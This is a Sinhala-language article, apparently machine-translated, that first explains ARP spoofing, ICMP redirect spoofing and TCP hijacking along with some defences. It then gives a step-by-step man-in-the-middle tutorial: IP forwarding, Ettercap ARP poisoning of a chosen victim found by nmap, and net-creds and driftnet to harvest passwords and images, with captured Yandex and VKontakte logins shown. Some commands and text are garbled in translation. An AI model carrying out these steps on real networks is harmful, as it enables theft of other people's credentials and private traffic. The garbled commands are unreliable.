ගමනාගමනය හරවා යැවීමට හැකර්වරුන් භාවිතා කරයි. හැකර් ප්රහාරයේ මාර්ග. Burp සමඟ දත්ත වංචා කිරීම

ජාල තදබදයට බාධා කිරීමේ ක්‍රම

ජාල විශ්ලේෂක වැඩසටහන් භාවිතයෙන් ජාලයට සවන් දීම පළමු, වඩාත්ම වේ සරල ආකාරයකින්දත්ත අන්තර් නිරෝධනය.

ජාල අනවසරයෙන් ආරක්ෂා වීමට, අයදුම් කරන්න විශේෂ වැඩසටහන්, උදාහරණයක් ලෙස, ජාල තදබදයට සවන් දෙන ජාලයේ පරිගණක හඳුනා ගැනීමට හැකි වන AntiSniff.

ඔවුන්ගේ ගැටළු විසඳීම සඳහා, ස්නයිෆර් විරෝධී වැඩසටහන් ජාලයේ සවන්දීමේ උපකරණ තිබීම පිළිබඳ විශේෂ සලකුණක් භාවිතා කරයි - ස්නයිෆර් පරිගණකයේ ජාල කාඩ්පත විශේෂ සවන්දීමේ මාදිලියක තිබිය යුතුය. සවන්දීමේ ප්‍රකාරයේදී, ජාලගත පරිගණක පරීක්‍ෂණය යටතේ සත්කාරක වෙත යවන ලද IP දත්ත ග්‍රෑම් වෙත විශේෂ ආකාරයකින් ප්‍රතිචාර දක්වයි. උදාහරණයක් ලෙස, සවන්දීමේ ධාරක සාමාන්‍යයෙන් ධාරක ලිපිනයට යවන ලද දත්ත ග්‍රෑම් පමණක් නොව, පැමිණෙන සියලුම තදබදය සකසයි. AntiSniff හට හඳුනාගත හැකි සැක සහිත සත්කාරක හැසිරීම් වල වෙනත් සලකුණු තිබේ.

නිසැකවම, ප්‍රහාරකයෙකුගේ දෘෂ්ටි කෝණයෙන් සවන්දීම ඉතා ප්‍රයෝජනවත් වේ, එය ඔබට ප්‍රයෝජනවත් තොරතුරු රාශියක් ලබා ගැනීමට ඉඩ සලසයි - ජාලය හරහා සම්ප්‍රේෂණය වන මුරපද, ජාල පරිගණක ලිපින, රහස්‍ය දත්ත, ලිපි සහ යනාදිය. කෙසේ වෙතත්, සරල අනවසරයෙන් ඇහුන්කන් දීම, දත්ත වෙනස් කිරීමට සහ දූෂිත කිරීමට ධාරක දෙකක් අතර ජාල සන්නිවේදනයට බාධා කිරීමෙන් හැකර්වරයෙකුට බාධා කරයි. මෙම ගැටළුව විසඳීම සඳහා වඩාත් සංකීර්ණ තාක්ෂණයක් අවශ්ය වේ.

A සහ B ධාරක දෙක අතර ජාල සන්නිවේදනයේ ක්‍රියාවලියට බාධා කිරීම සහ ලූප් කිරීම සඳහා, ප්‍රහාරකයෙකුට A සහ ​​B ධාරක වෙත ව්‍යාජ ARP (ලිපින විභේදන ප්‍රොටෝකෝලය) පණිවිඩ යැවීමෙන් අන්තර්ක්‍රියා කරන ධාරකයන්ගේ IP ලිපින ඔවුන්ගේම IP ලිපිනය සමඟ ප්‍රතිස්ථාපනය කළ හැකිය. .

සහල්. 1 ව්‍යාජ ARP ඉල්ලීම්

අපි බලමු Hacker කෙනෙකුට ARP ප්‍රොටෝකෝලය භාවිතා කර A සහ ​​B ධාරක අතර ජාල සන්නිවේදනයට බාධා කරන්නේ කෙසේදැයි බලමු.

A සහ B ධාරක අතර ජාල ගමනාගමනය බාධා කිරීම සඳහා, හැකර්වරයෙකු මෙම ධාරක මත ඔහුගේ IP ලිපිනය බල කරන අතර එමඟින් A සහ ​​B පණිවිඩ හුවමාරු කිරීමේදී මෙම ව්‍යාජ IP ලිපිනය භාවිතා කරයි. ඔවුන්ගේ IP ලිපිනය පැනවීමට, හැකර් පහත සඳහන් මෙහෙයුම් සිදු කරයි.

  • ප්‍රහාරකයෙකු විසින් ධාරක A සහ ​​B හි MAC ලිපින තීරණය කරයි, උදාහරණයක් ලෙස, W2RK පැකේජයෙන් nbtstat විධානය භාවිතා කරයි.
  • ප්‍රහාරකයා A සහ ​​B ධාරකයන්ගේ හඳුනාගත් MAC ලිපින වෙත පණිවිඩ යවයි, ඒවා පරිගණකවල MAC ලිපින වෙත ධාරකයන්ගේ IP ලිපින විසඳීමට කරන ඉල්ලීම් සඳහා අසත්‍ය ARP ප්‍රතිචාර වේ. සත්කාරක A හට සත්කාරක B හි IP ලිපිනය ප්‍රහාරකයාගේ පරිගණකයේ MAC ලිපිනයට ගැළපෙන බව කියනු ලැබේ; සත්කාරක B හට සත්කාරක A ගේ IP ලිපිනය ද ප්‍රහාරකයාගේ පරිගණකයේ MAC ලිපිනයට ගැළපෙන බව දන්වා ඇත.
  • A සහ B ධාරක විසින් ලැබුණු MAC ලිපින ඔවුන්ගේ ARP හැඹිලි තුළට ඇතුළු කර එකිනෙකාට පණිවිඩ යැවීමට ඒවා භාවිතා කරයි. IP ලිපින A සහ ​​B ප්‍රහාරකයාගේ පරිගණකයේ MAC ලිපිනයට අනුරූප වන බැවින්, සත්කාරක A සහ ​​B කිසිවක් නොදැන, ඔවුන්ගේ පණිවිඩ සමඟ ඔවුන්ට අවශ්‍ය ඕනෑම දෙයක් කිරීමට හැකියාව ඇති අතරමැදියෙකු හරහා සන්නිවේදනය කරයි.

එවැනි ප්‍රහාර වලින් ආරක්ෂා වීමට, ජාල පරිපාලකයින් තම ජාල පරිගණක වල ​​MAC ලිපින සහ IP ලිපින අතර සිතියම්ගත කිරීමේ වගුවක් සහිත දත්ත සමුදායක් පවත්වා ගත යුතුය.

UNIX ජාල වලදී, arpredirect වැනි පද්ධතියේ ජාල ගමනාගමන නිරීක්ෂණ සහ පාලන උපයෝගිතා භාවිතයෙන් මෙවැනි වංචාකාරී ARP ප්‍රහාරයක් ක්‍රියාත්මක කළ හැක. අවාසනාවකට මෙන්, එවැනි විශ්වසනීය උපයෝගිතා වින්ඩෝස් ජාල තුළ ක්රියාත්මක වන බවක් නොපෙනේ. උදාහරණයක් ලෙස, NTsecurity වෙබ් අඩවියේ, ඔබට GrabitAII උපයෝගීතාව බාගත කළ හැකිය, එය ජාල සත්කාරක අතර ගමනාගමනය හරවා යැවීම සඳහා මෙවලමක් ලෙස ඉදිරිපත් කෙරේ. කෙසේ වෙතත්, GrabitAII උපයෝගීතාවයේ මූලික කාර්ය සාධන පරීක්ෂාවකින් පෙන්නුම් කරන්නේ එය තවමත් එහි කාර්යයන් ක්‍රියාත්මක කිරීමේදී සම්පූර්ණ සාර්ථකත්වයෙන් ඈත්ව ඇති බවයි.

ජාල ගමනාගමනයට බාධා කිරීම සඳහා, ප්‍රහාරකයෙකුට ජාල රවුටරයක සැබෑ IP ලිපිනය ඔහුගේම IP ලිපිනය සමඟ ප්‍රතිස්ථාපනය කළ හැකිය, උදාහරණයක් ලෙස, වංචා කරන ලද ICMP යළි-යොමුවීම් පණිවිඩ භාවිතයෙන්. RFC-1122 ට අනුව, සත්කාරක A විසින් ලැබුණු යළි-යොමුවීම් පණිවිඩය වෙනත් ධාරකයකට යවන ලද දත්ත ග්‍රෑම් එකකට ප්‍රතිචාරයක් ලෙස අර්ථ දැක්විය යුතුය, උදාහරණයක් ලෙස, B. Host A විසින් ලැබුණු යළි-යොමුවීම් පණිවිඩයේ අන්තර්ගතය මත පදනම්ව යළි-යොමුවීම් පණිවිඩය මත එහි ක්‍රියා තීරණය කරයි, සහ Datagrams A සිට B දක්වා නව මාර්ගයකට හරවා යැවීමට යළි-යොමු කර ඇත්නම්, එය සත්කාරක A විසින් සිදු කරනු ඇත.

සහල්. 2 වැරදි මාර්ගගත කිරීම

වංචාව මෙහෙයවීම සිදු කිරීමට, ප්‍රහාරකයෙකු සංවිධානය පිළිබඳ යම් විස්තර දැනගත යුතුය දේශීය ජාලය, ධාරක A පිහිටා ඇති තැන, විශේෂයෙන්, ධාරක A සිට B දක්වා ගමනාගමනය යවන රවුටරයේ IP ලිපිනය. මෙය දැනගත්, ප්‍රහාරකයා IP දත්ත ග්‍රෑම් එකක් සාදනු ඇත, එහි මූලාශ්‍ර IP ලිපිනය IP ලිපිනය ලෙස අර්ථ දක්වා ඇත. රවුටරය, සහ ලබන්නා සඳහන් කර ඇත සත්කාරක A. දත්ත ග්‍රාමයේ ඇතුලත් කර ඇති ICMP යළි-යොමුවීම් පණිවිඩයක් නව රවුටරයේ ලිපින ක්ෂේත්‍රය ප්‍රහාරකයාගේ පරිගණකයේ IP ලිපිනයට සකසා ඇත. එවැනි පණිවිඩයක් ලැබුණු පසු, සත්කාරක A සියළුම පණිවිඩ ප්‍රහාරකයාගේ පරිගණකයේ IP ලිපිනයට යවයි.

එවැනි ප්‍රහාරයකින් ආරක්ෂා වීමට, ඔබ සත්කාරක A හි ICMP යළි-යොමුවීම් පණිවිඩ සැකසීම අක්‍රිය කළ යුතුය (උදාහරණයක් ලෙස, ෆයර්වෝල් භාවිතා කිරීම), සහ ට්‍රේසර්ට් විධානය (Unix හි මෙය tracerout විධානය වේ) ප්‍රහාරකයාගේ පරිගණකයේ IP ලිපිනය හෙළිදරව් කළ හැක. . ඇත්ත වශයෙන්ම, ජාල පරිපාලකයා සුපරීක්ෂාකාරී නම්, ස්ථාපනය අතරතුර ලබා දී නොමැති දේශීය ජාලයේ දිස් වූ අතිරේක මාර්ගයක් සොයා ගැනීමට මෙම උපයෝගිතාවලට හැකි වේ.

දත්තවල රහස්‍ය තොරතුරු තිබේ නම් ජාලය හරහා සම්ප්‍රේෂණය වන දත්ත ආරක්‍ෂා කිරීමේ අවශ්‍යතාවය පිළිබඳව ඉහත සඳහන් අන්තර්ග්‍රහණ උදාහරණ (ප්‍රහාරකයන්ට සීමා නොවේ) ඒත්තු ගන්වයි. ජාල ගමනාගමනයට බාධා කිරීම් වලින් ආරක්ෂා වීමේ එකම ක්‍රමය වන්නේ ගුප්ත ලේඛන ඇල්ගොරිතම සහ සංකේතාංකන ප්‍රොටෝකෝල ක්‍රියාත්මක කරන සහ රහස් තොරතුරු අනාවරණය කිරීම සහ ආදේශ කිරීම වැළැක්වීමේ වැඩසටහන් භාවිතා කිරීමයි. එවැනි ගැටළු විසඳීම සඳහා, ගුප්තකේතනය මඟින් ආරක්ෂිත ප්‍රොටෝකෝල හරහා සම්ප්‍රේෂණය වන පණිවිඩ සංකේතනය කිරීම, අත්සන් කිරීම සහ සත්‍යාපනය කිරීම සඳහා මාධ්‍යයන් සපයයි.

තොරතුරු හුවමාරුව ආරක්ෂා කිරීම සඳහා සියලුම ගුප්ත ලේඛන ක්රම ප්රායෝගිකව ක්රියාත්මක කිරීම මගින් සපයනු ලැබේ VPN ජාල(අථත්‍ය පුද්ගලික ජාලය - අතථ්‍ය පුද්ගලික ජාල).

TCP සම්බන්ධතා බාධාව

වඩාත් සංකීර්ණ ජාල ගමනාගමන බාධා කිරීම් ප්‍රහාරය TCP සම්බන්ධතා පැහැර ගැනීම (TCP පැහැර ගැනීම) ලෙස සැලකිය යුතුය, හැකර් කෙනෙක්, TCP පැකට් ප්‍රහාරයට ලක් වූ ධාරකයට ජනනය කර යැවීමෙන්, ධාරකය සමඟ වත්මන් සන්නිවේදන සැසියට බාධා කරන විට. තවද, TCP ප්‍රොටෝකෝලයේ හැකියාවන් භාවිතයෙන් බාධා වූ TCP සම්බන්ධතාවයක් යථා තත්වයට පත් කිරීම, හැකර් විසින් බාධා කළ සන්නිවේදන සැසියට බාධා කර විසන්ධි වූ සේවාදායකයා වෙනුවට එය දිගටම කරගෙන යයි.

TCP පැහැරගැනීම් ප්‍රහාර සිදු කිරීම සඳහා ඵලදායී උපයෝගිතා කිහිපයක් නිර්මාණය කර ඇත, නමුත් ඒවා සියල්ලම Unix වේදිකාව සඳහා ක්‍රියාත්මක කර ඇති අතර, මෙම උපයෝගිතා වෙබ් අඩවි වල ඇත්තේ ප්‍රභව කේත ආකාරයෙන් පමණි. මේ අනුව, TCP සම්බන්ධතාවයකට බාධා කිරීමෙන් ප්‍රහාර සඳහා වැඩි ප්‍රයෝජනයක් නොමැත.

TCP (සම්ප්‍රේෂණ පාලන ප්‍රොටෝකෝලය) මූලික ප්‍රවාහන ප්‍රොටෝකෝල වලින් එකකි. OSI ස්ථරය, අතථ්‍ය සන්නිවේදන නාලිකාවක් හරහා තාර්කික සම්බන්ධතා ඇති කර ගැනීමට ඔබට ඉඩ සලසයි. පැකට් මෙම නාලිකාව හරහා සම්ප්‍රේෂණය කර ලැබෙන අතර ඒවායේ අනුපිළිවෙල ලියාපදිංචි කිරීම, පැකට් ප්‍රවාහය පාලනය කිරීම, විකෘති කළ පැකට් නැවත සම්ප්‍රේෂණය කිරීම සංවිධානය කිරීම සහ සැසිය අවසානයේ සන්නිවේදන නාලිකාව කැඩී යයි. TCP යනු එකම ප්‍රොටෝකෝලයයි මූලික ප්රොටෝකෝලයඋසස් පණිවිඩයක් සහ සම්බන්ධතා හඳුනාගැනීමේ පද්ධතියක් ඇති TCP / IP පවුලෙන්.

Software Packet Sniffers පිළිබඳ දළ විශ්ලේෂණය

සියලුම මෘදුකාංග ස්නිෆර් දළ වශයෙන් කාණ්ඩ දෙකකට බෙදිය හැකිය: දියත් කිරීමට සහාය වන ස්නිෆර් විධාන රේඛාව, සහ චිත්‍රක අතුරුමුහුණතක් සහිත sniffers. ඒ අතරම, මෙම ලක්ෂණ දෙකම ඒකාබද්ධ කරන sniffers ඇති බව අපි සටහන් කරමු. මීට අමතරව, sniffers ඔවුන් සහය දක්වන ප්‍රොටෝකෝල, බාධා කළ පැකට් විශ්ලේෂණයේ ගැඹුර, පෙරහන් වින්‍යාස කිරීමේ හැකියාව සහ අනෙකුත් වැඩසටහන් සමඟ ගැළපීමේ හැකියාව තුළ එකිනෙකාගෙන් වෙනස් වේ.

සාමාන්යයෙන් ඕනෑම ස්නයිෆර්ගේ කවුළුව GUIප්රදේශ තුනකින් සමන්විත වේ. පළමු එක අල්ලා ගත් පැකට් වල සාරාංශයක් පෙන්වයි. සාමාන්‍යයෙන්, මෙම ප්‍රදේශය අවම ක්ෂේත්‍ර ප්‍රදර්ශනය කරයි, එනම්: පැකට් ග්‍රහණ කාලය; පැකට්ටුව යවන්නාගේ සහ ලබන්නාගේ IP ලිපින; පැකට් මූලාශ්‍ර සහ ගමනාන්ත MAC ලිපින, මූලාශ්‍ර සහ ගමනාන්ත වරාය ලිපින; ප්රොටෝකෝල වර්ගය (ජාලය, ප්රවාහනය හෝ යෙදුම් ස්ථරය); බාධා කළ දත්ත පිළිබඳ සමහර සාරාංශ තොරතුරු. දෙවන ප්‍රදේශය තනි තෝරාගත් පැකේජය පිළිබඳ සංඛ්‍යානමය තොරතුරු පෙන්වයි, අවසාන වශයෙන්, තුන්වන ප්‍රදේශය ෂඩාස්‍රාකාර හෝ අක්ෂර ආකාරයෙන් පැකේජය ඉදිරිපත් කරයි - ASCII.

සියලුම පැකට් ස්නිෆර් පාහේ විකේතනය කළ පැකට් විශ්ලේෂණයට ඉඩ සලසයි (පැකට් ස්නිෆර් පැකට් විශ්ලේෂක හෝ ප්‍රොටෝකෝල විශ්ලේෂක ලෙසද හැඳින්වේ). ස්නයිෆර් විසින් බාධා කරන ලද පැකට් ස්ථර සහ ප්‍රොටෝකෝල මගින් බෙදා හරිනු ලැබේ. සමහර පැකට් විශ්ලේෂකයින්ට ප්‍රොටෝකෝලය හඳුනා ගැනීමට සහ අල්ලා ගත් තොරතුරු ප්‍රදර්ශනය කිරීමට හැකි වේ. මෙම ආකාරයේ තොරතුරු සාමාන්‍යයෙන් ස්නිෆර් කවුළුවේ දෙවන ප්‍රදේශයේ ප්‍රදර්ශනය කෙරේ. උදාහරණයක් ලෙස, ඕනෑම sniffer හට TCP ප්‍රොටෝකෝලය හඳුනා ගත හැකි අතර, උසස් sniffer හට මෙම ගමනාගමනය උත්පාදනය කළේ කුමන යෙදුමද යන්න තීරණය කළ හැක. බොහෝ ප්‍රොටෝකෝල විශ්ලේෂකයින් විවිධ ප්‍රොටෝකෝල 500 කට වඩා හඳුනා ගන්නා අතර ඒවා නමින් විස්තර කර විකේතනය කළ හැකිය. Sniffer හට විකේතනය කර තිරය මත ඉදිරිපත් කිරීමට හැකි වැඩි තොරතුරු, ඔබට අතින් විකේතනය කිරීමට සිදු වන්නේ අඩුවෙන්.

පැකට් ස්නයිෆර්වලට පැන යා හැකි එක් ගැටලුවක් නම් පෙරනිමි වරාය හැර වෙනත් තොටක් භාවිතයෙන් ප්‍රොටෝකෝලයක් නිවැරදිව හඳුනා ගැනීමට නොහැකි වීමයි. උදාහරණයක් ලෙස, ආරක්ෂාව වැඩි දියුණු කිරීම සඳහා, සමහර සුප්‍රසිද්ධ යෙදුම් පෙරනිමි වරායන් හැර වෙනත් වරායන් භාවිතා කිරීමට වින්‍යාස කළ හැක. එබැවින්, වෙබ් සේවාදායකය සඳහා වෙන් කර ඇති සාම්ප්‍රදායික වරාය 80 වෙනුවට, ලබා දී ඇති සේවාදායකයවරාය 8088 හෝ වෙනත් ඕනෑම එකක් මත නැවත සකස් කිරීමට බල කළ හැක. මෙම තත්වය තුළ සමහර පැකට් විශ්ලේෂකයින්ට ප්‍රොටෝකෝලය නිවැරදිව තීරණය කිරීමට නොහැකි වන අතර පහළ මට්ටමේ ප්‍රොටෝකෝලය (TCP හෝ UDP) පිළිබඳ තොරතුරු පමණක් ප්‍රදර්ශනය කිරීමට නොහැකි වේ.

ප්ලග්-ඉන් හෝ බිල්ට් මොඩියුල ලෙස මෘදුකාංග විශ්ලේෂණ මොඩියුල සමඟ එන මෘදුකාංග ස්නිෆර් ඇත, එමඟින් බාධා කළ ගමනාගමනය පිළිබඳ ප්‍රයෝජනවත් විශ්ලේෂණාත්මක තොරතුරු සමඟ වාර්තා නිර්මාණය කිරීමට ඔබට ඉඩ සලසයි.

බොහෝ මෘදුකාංග පැකට් ස්නිෆර් වල තවත් ලක්ෂණයක් වන්නේ ට්‍රැෆික් ග්‍රහණය කර ගැනීමට පෙර සහ පසු පෙරහන් වින්‍යාස කිරීමේ හැකියාවයි. පෙරහන් මඟින් යම් යම් පැකට් සාමාන්‍ය ගමනාගමනයෙන් වෙන් කරන ලද නිර්ණායකයකට අනුව, ගමනාගමනය විශ්ලේෂණය කිරීමේදී අනවශ්‍ය තොරතුරු ඉවත් කිරීමට ඔබට ඉඩ සලසයි.

Ettercap විකල්ප

Ettercap යනු වඩාත්ම ජනප්‍රිය මිනිසා-මැද ප්‍රහාර වැඩසටහනයි, නමුත් එය හොඳම ද? සම්පූර්ණ අත්පොත පුරාම, Ettercap කිසි විටෙකත් තනිවම භාවිතා නොකරන බවත්, එක් හෝ තවත් වැඩසටහනක් සෑම විටම රථවාහන සැකසුම් දාමයක් සමඟ පෙළගැසී ඇති බවත් ඔබට පෙනෙනු ඇත. සමහර විට මෙය නම්‍යශීලී බවක් එක් කරයි, සාමාන්‍යයෙන්, මෙම ප්‍රවේශය UNIX හි හදවතේ ඇත - එක් වැඩසටහනක් එක් කාර්යයක් ඉටු කරයි, සහ අවසාන පරිශීලකයා අපේක්ෂිත ප්‍රති result ලය ලබා ගැනීම සඳහා විවිධ වැඩසටහන් ඒකාබද්ධ කරයි. මෙම ප්රවේශය සමඟ, වැඩසටහන් කේතය නඩත්තු කිරීම පහසුය; එවැනි කුඩා "ගඩොල්" ඕනෑම සංකීර්ණතාවයක් සහ නම්යශීලී පද්ධතියක් ගොඩනැගීමට භාවිතා කළ හැකිය. එසේ වුවද, විවිධ කාර්යයන් සහිත විවෘත කොන්සෝල පහක් තිබීම, එක් ප්‍රති result ලයක් ලබා ගැනීම අරමුණු කරගත් වැඩසටහන් වල කාර්යය එතරම් පහසු නැත, එය වඩා දුෂ්කර ය, යම් අවස්ථාවක දී වැරැද්දක් කිරීමට අවස්ථාවක් තිබේ, සහ සමස්ත වින්‍යාසගත පද්ධතිය නිෂ්ක්‍රීයව දුවනු ඇත.

Net-Creds sniffs:

  • පිවිසි URL
  • POST ඉල්ලීම් යැව්වා
  • HTTP ආකෘතිවලින් පිවිසුම්/මුරපද
  • මූලික HTTP සත්‍යාපනය සඳහා පිවිසුම්/මුරපද
  • HTTP සෙවීම්
  • FTP පිවිසුම්/මුරපද
  • IRC පිවිසුම්/මුරපද
  • POP පිවිසුම්/මුරපද
  • IMAP පිවිසුම්/මුරපද
  • Telnet පිවිසුම්/මුරපද
  • SMTP පිවිසුම්/මුරපද
  • SNMP ප්‍රජා පෙළ
  • HTTP, SMB, LDAP වැනි සියලුම සහය දක්වන NTLMv1/v2 ප්‍රොටෝකෝල.
  • කර්බෙරෝස්

බාධා කළ පින්තූර හොඳ තේරීමක්, සහ driftnet මේ සම්බන්ධයෙන් සරලයි - එය පෙන්වන්නේ බාධා කළ පින්තූර පමණි.

ඔබේ යන්ත්‍රය ඉදිරියට යැවීමේ ප්‍රකාරයට මාරු කරන්න.

echo "1" > /proc/sys/net/ipv4/ip_forward

අපි Ettercap ආරම්භ කරන්නේ චිත්‍රක අතුරුමුහුණතකින් ( -ජී):

එටර්කැප්-ජී

දැන් තෝරන්න සත්කාරක, එහි උප ඡේදයක් ඇත සත්කාරක සඳහා පරිලෝකනය කරන්න. ස්කෑන් කිරීම සම්පූර්ණ වූ පසු, තෝරන්න සත්කාරක ලැයිස්තුව:

පරිදි ඉලක්ක 1රවුටරය තෝරන්න ( ඉලක්කය 1 වෙත එක් කරන්න), පරිදි ඉලක්ක2ඔබට පහර දීමට අවශ්‍ය උපාංගය තෝරන්න ( ඉලක්කය 2 වෙත එක් කරන්න).

නමුත් මෙහිදී පළමු බාධාව මතු විය හැකිය, විශේෂයෙන් බොහෝ සත්කාරකයන් සිටී නම්. ඉහත ඉදිරිපත් කර ඇති වීඩියෝව ඇතුළුව විවිධ උපදෙස් වලදී, කතුවරුන් ඉලක්ක යන්ත්‍රයට නැඟී (යම් හේතුවක් නිසා, සෑම කෙනෙකුටම එහි වින්ඩෝස් ඇත) සහ දේශීය ජාලයේ මෙම යන්ත්‍රයේ IP බැලීමට විධානය භාවිතා කරන්න. එකඟ වන්න, මෙම විකල්පය සැබෑ කොන්දේසි සඳහා පිළිගත නොහැකි ය.

සමඟ ස්කෑන් කළහොත්, ඔබට ටිකක් ලබා ගත හැකිය අමතර තොරතුරුධාරක ගැන, වඩාත් නිවැරදිව, ජාල කාඩ්පතේ නිෂ්පාදකයා ගැන:

nmap -sn 192.168.1.0/24

දත්ත තවමත් ප්‍රමාණවත් නොවේ නම්, ඔබට OS නිර්වචනය සමඟ ස්කෑන් කිරීමක් කළ හැකිය:

nmap -O 192.168.1.0/24

ඔබට පෙනෙන පරිදි, IP 192.168.1.33 සහිත යන්ත්‍රය වින්ඩෝස් බවට පත් විය, මෙය ඉහළින් ඇති ලකුණක් නොවේ නම්, එය කුමක්ද? 😉 lol

ඒක තමයි අපි දෙවැනි ඉලක්කය විදියට එකතු කරන්නේ.

දැන් අපි මෙනු අයිතමයට යමු. Mitm. එතන තෝරන්න ARP විෂ වීම...කොටුව පරීක්ෂා කරන්න දුරස්ථ සම්බන්ධතා උකහා ගන්න.

අපි අස්වැන්න නෙළීමට පටන් ගනිමු, එක් කවුළුවකින් අපි දියත් කරමු

ශුද්ධ ණය

තවත් එකක (වැඩසටහන් දෙකම විකල්ප නොමැතිව ධාවනය කළ හැක)

ප්ලාවිත දැල

දත්ත රැස් කිරීම වහාම ආරම්භ විය.

දකුණු පැත්තේ, driftnet විසින් අල්ලා ගත් පින්තූර පෙන්වන තවත් කවුළුවක් විවෘත කර ඇත. net-creds කවුළුව තුළ, අපි සංචාරය කළ අඩවි සහ බාධා කළ මුරපද දකිමු:

1.2 Ettercap + Burp Suite

3. Ettercap හි දත්ත බලන්න (වෙබ් අඩවි නැරඹූ සහ අල්ලා ගත් මුරපද).

මෙනුවේ දැක්මඅපට ටැබ් තිබේ සම්බන්ධතාසහ පැතිකඩ. ඔබට කොටුව සලකුණු කිරීමටද හැකිය IP ලිපින විසඳන්න(IP ලිපින පරිවර්තනය කරන්න). සම්බන්ධතා, ඇත්ත වශයෙන්ම, සම්බන්ධතා වේ. Ettercap එය සොයා ගන්නා එක් එක් සත්කාරක සඳහා මතකයේ පැතිකඩ එකතු කරයි. පරිශීලකයන් සහ මුරපද එහි එකතු කරනු ලැබේ. මෙම අවස්ථාවේදී, ග්‍රහණය කරගත් ගිණුම් දත්ත (මුරපද) සහිත පැතිකඩ කුරුසයකින් සලකුණු කර ඇත:

පැතිකඩ මත ඕනෑවට වඩා රඳා නොසිටින්න - නිදසුනක් ලෙස, FTP සහ වෙනත් සේවාවන් සඳහා බාධා කළ පිවිසුම් සහ මුරපද සලකුණු කර ඇති අතර, ඒ සඳහා වැඩසටහනට ලැබුණු තොරතුරු අක්තපත්‍ර ලෙස පැහැදිලිව අර්ථ දැක්විය හැකිය. උදාහරණයක් ලෙස, මූලික සත්‍යාපන දත්ත, ඇතුළත් කළ පිවිසුම් සහ වෙබ් පෝරමවල මුරපද මෙයට ඇතුළත් නොවේ.

සම්බන්ධතා වලදී, වඩාත්ම විශ්වාසදායක දත්ත තරු ලකුණකින් සලකුණු කර ඇත:

විස්තර බැලීමට ඔබට මෙම ඇතුළත් කිරීම් මත දෙවරක් ක්ලික් කළ හැකිය:

සම්පූර්ණ ලැයිස්තුවේ මෙම තරු සෙවීම නොකිරීමට, ඔබට මෙම ක්ෂේත්‍රය අනුව වර්ග කළ හැකි අතර ඒවා සියල්ලම ඉහළින් හෝ පහළින් ඇත:

මූලික සත්‍යාපනය හසු විය:

Yandex සඳහා පිවිසුම්-මුරපදය (පහත උද්දීපනය කර ඇත):

මේවා Vkontakte සඳහා බාධා කළ අක්තපත්‍ර වේ:

එසේම, වඩාත් රසවත් දත්ත පහළ කොන්සෝලය තුළ එකතු කරනු ලැබේ:

ඔබට වැඩසටහනේ ප්‍රතිඵල සුරැකීමට අවශ්‍ය නම්, මෙම විකල්ප භාවිතා කරන්න (Ettercap ආරම්භ කිරීමේදී යතුරු සඳහන් කරන්න:

ලොග් විකල්ප: -w, --write<файл>අල්ලා ගත් දත්ත pcapfile වෙත ලියන්න<файл>-L, --log<логфайл>මේකට ඔක්කොම ට්‍රැෆික් ලියන්න<логфайл>-l, --ලොග් තොරතුරු<логфайл>මෙයට නිෂ්ක්‍රීය තොරතුරු පමණක් ලියන්න<логфайл>-m, --log-msg<логфайл>සියලුම පණිවිඩ මෙයට ලියන්න<логфайл>-c, --compress ලොග් ගොනු සඳහා gzip සම්පීඩනය භාවිතා කරන්න

4. Ettercap හි පියාසර කිරීමේදී දත්ත ආදේශ කිරීම

4.1 අභිරුචි Ettercap පෙරහන් භාවිතා කිරීම

සටහන: මගේ සියලුම පරීක්ෂණ වලදී, Ettercap පෙරහන් ක්‍රියා කළේ නැත. එය අතේ තිබේද, දෘඩාංග විශේෂාංගවලද නැතහොත් වැඩසටහනේම දෝෂයකද යන්න තේරුම් ගැනීමට අපහසුය ... නමුත් 0.8.2 අනුවාදය සඳහා (මේ මොහොතේ නවතම), පෙරහන් වල ගැටළු පිළිබඳ දෝෂ වාර්තාවක් ඇත. සාමාන්‍යයෙන්, දෝෂ වාර්තා සහ සංසද අනුව විනිශ්චය කිරීම, පෙරහන් බොහෝ විට වැටේ, නැතහොත් දිගු කාලයක් ක්‍රියා නොකරයි. මාස 5 කට පෙර වෙනස් කරන ලද ශාඛාවක් තිබේ https://github.com/Ettercap/ettercap/tree/filter-improvements, i.e. පෙරහන්-වැඩිදියුණු කිරීම් (පෙරහන වැඩිදියුණු කිරීම් සමඟ). මෙම ශාඛාව සඳහා විවිධාකාර පරීක්ෂණ සිදු කරන ලද අතර ගබඩාවේ සිට අනුවාදය සඳහා විවිධ ෆිල්ටර විවිධ තත්වයන් යටතේ පරීක්ෂා කරන ලදී, බොහෝ කාලයක් ගත වූ නමුත් ප්රතිඵලයක් නොලැබුණි. මාර්ගය වන විට, Kali Linux හි පෙරහන්-වැඩිදියුණු කිරීමේ අනුවාදය ස්ථාපනය කිරීමට, ඔබ මෙය කළ යුතුය:

sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper බයිසන් චෙක් cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurnets15-dev libncurnetses libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd ENDOC_DF build =On ../ sudo make install කරන්න

පොදුවේ, ඔබේ පෙරහන් ක්රියා නොකරන්නේ නම්, ඔබ තනිවම නොවේ. Ettercap සඳහා වන උපදෙස් වල, මට පෙරහන් මාතෘකාව මඟ හැරිය නොහැක, එබැවින් ඒවා කෙසේ හෝ සලකා බලනු ඇත.

මෙතෙක් අපි ARP spoofing සඳහා Ettercap භාවිතා කර ඇත. මෙය ඉතා මතුපිටින් පෙනෙන යෙදුමකි. අභිරුචි පෙරහන් වලට ස්තූතියි, අපට පියාසර කිරීමේදී මැදිහත් වී ගමනාගමනය වෙනස් කළ හැකිය. පෙරහන් වෙනම ගොනු වල අඩංගු විය යුතු අතර භාවිතයට පෙර Etterfilter වැඩසටහන සමඟ සම්පාදනය කළ යුතුය. සබැඳිය ලබා දී ඇති ලියකියවිලි කෙටි බවක් පෙනෙන්නට තිබුණත්, පහත උදාහරණ සමඟ සම්බන්ධ වී ඇති නමුත්, එය ඔබට ඉතා රසවත් පෙරහන් ලිවීමට ඉඩ සලසයි.

අපි අපගේ පළමු පෙරහන නිර්මාණය කරමු, එය සියලුම පින්තූර ප්‍රතිස්ථාපනය කරයි:

img_replacer.filter නම් ගොනුවක පිටපත:

